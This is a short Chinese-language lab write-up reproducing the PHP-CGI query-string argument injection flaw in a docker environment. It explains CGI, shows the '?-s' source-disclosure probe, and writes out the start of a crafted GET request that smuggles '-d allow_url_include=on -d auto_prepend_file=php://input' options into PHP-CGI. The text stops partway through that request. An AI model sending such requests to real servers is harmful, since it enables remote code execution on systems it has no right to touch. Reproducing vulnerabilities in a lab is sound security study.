前言
这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。
CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。
复现
在相应的漏洞环境中输入
docker-compose up -d
生成环境
访问:http://your-ip:8080
环境成功搭建了,接下了去复现。
访问http://your-ip:8080/index.php?-s
可以看到爆出了代码,证明漏洞存在的
抓包构造数据包
GET /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
H